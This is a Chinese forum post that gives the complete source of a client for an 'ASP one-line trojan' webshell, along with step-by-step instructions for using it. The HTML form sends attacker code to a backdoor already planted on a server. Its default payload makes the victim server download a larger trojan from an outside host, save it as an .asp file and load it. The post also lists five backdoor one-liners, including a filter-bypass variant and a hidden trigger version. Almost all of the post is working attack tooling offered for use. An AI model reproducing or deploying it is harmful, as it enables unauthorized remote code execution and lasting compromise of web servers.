找回密码
 注册
首页 ≡≡网络技术≡≡ 编程语言 asp一句话木马客户端下载和使用教程

asp一句话木马客户端下载和使用教程

灰儿 2017-2-20 11:34:44
4年前写过的一个小小的asp木马利用程序。
可以调用XMLHTTP控件让服务器从网上下载ASP木马并保存在服务器上!
可以突破服务器的关键词过滤而导制的我们的大马无法正常提交的障碍!
asp一句话木客户端代码如下:

  1. <HTML><HEAD><TITLE>ASP一句话客户端</TITLE>
  2. <META http-equiv=Content-Type content="text/html; charset=gb2312">
  3. <STYLE type=text/css><!--
  4. body {
  5.     background-color: #000000;
  6.     font-size: 12px;
  7. }
  8. .bad {
  9.     border: 1px solid #33ff00;
  10.     font-size: 12px;
  11.     link{COLOR:#33ff00;};A:visited{COLOR:#33ff00;};
  12. }
  13. -->
  14. </STYLE>

  15. <META content="MSHTML 6.00.2900.3132" name=GENERATOR></HEAD>
  16. <BODY>
  17. <CENTER>
  18. <DIV
  19. style="FONT-SIZE: 16pt; FILTER: glow(color=#33ff00, strength=6); WIDTH: 350px; COLOR: #33ff00; LINE-HEIGHT: 35pt; FONT-FAMILY: Comic Sans MS; POSITION: relative"><br>ASP一句话客户端远程上传版</DIV>
  20. <TABLE class=bad height=14 cellSpacing=0 width=627 align=center border=1 boodercolor=#33ff00>
  21.   <TBODY>
  22.   <TR>
  23.     <TD width=794 height=1>
  24.       <FORM name=pass method=post><FONT color=#33ff00>服务端网址:</FONT><INPUT id=act
  25.       size=76 value=http:// name=act> <INPUT onclick=this.form.blfy.name=this.form.password.value;this.form.action=this.form.act.value; type=submit value=GOGOGO>
  26.       <BR><FONT color=#33ff00>登陆密码:  </font><INPUT id=password size=76 value=blfy name=password> <INPUT id=blfy
  27.       type=hidden
  28.       value='Execute("Session(""blfy"")=request(""*""):Execute(Session(""blfy""))")'
  29.       name=blfy> </TD></TR>
  30.   <TR>
  31.     <TD width=794 height=100><TEXTAREA name=* rows=5 cols=100 width="45">Set xPost = CreateObject("Microsoft.XMLHTTP")
  32.          xPost.Open "GET","http://www.jbl86.com/news.txt",False
  33.          xPost.Send()
  34.          Set sGet = CreateObject("ADODB.Stream")
  35.          sGet.Mode = 3
  36.          sGet.Type = 1
  37.          sGet.Open()
  38.          sGet.Write(xPost.responseBody)
  39.          sGet.SaveToFile Server.MapPath("kenn.asp"),2
  40.          set sGet = nothing
  41.          set sPOST = nothing
  42.          response.redirect "kenn.asp"</TEXTAREA> </TD></TR>
  43.   <TR>
  44.     <TD width=794 height=7><font color=#33ff00>把红色的<FONT color=red> blfy </FONT>换成您的密码!    提供五个服务端: <BR>1.
  45.       <%eval request("<FONT color=red>blfy</FONT>")%> <BR>2. <%execute
  46.       request("<FONT color=red>blfy</FONT>")%> <BR>3.
  47.       <%execute(request("<FONT color=red>blfy</FONT>"))%> <BR>
  48.       4、<script language=VBScript runat=server>execute request("<FONT color=red>blfy</FONT>")</Script>  突破<%%>过滤版<br>
  49.       5、<%If request("5") ="5" then eval request("<FONT color=red>blfy</FONT>") end if %>  隐蔽后门版,访问格式为: help.asp?5=5<br></font>
  50. </TD></TR></TBODY></TABLE>
  51. </FORM></CENTER><font color="#33ff00">
  52. <center>
  53. 本程序可以调用XMLHTTP控件让服务器从网上下载ASP木马并保存在服务器上!<br>
  54. 可以突破服务器的关键词过滤而导制的我们的大马无法正常提交的障碍! <br><br>
  55. 使用方法: 先把自己的ASP大马上传的自己的空间里.只能是TXT格式.<br>
  56. 再把 http://www.jbl86.com/news.txt 改成你的网马地址.如 http://www.921506.cn/muma.txt    <br>   
  57. 再把两个 kenn.asp 都改成你要保存的木马的文件名.如: muma.asp 默认地址可以不改: kenn.asp<br><br>
  58. 程序设计: Kenn    QQ:921506    Blog: <a href=http://www.cnblogs.com/kenn0626>myBlog</a></center></font></BODY></HTML>
复制代码


客户端界面截图:
001.jpg
您需要登录后才可以回帖 登录 | 注册
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言 了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言 了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。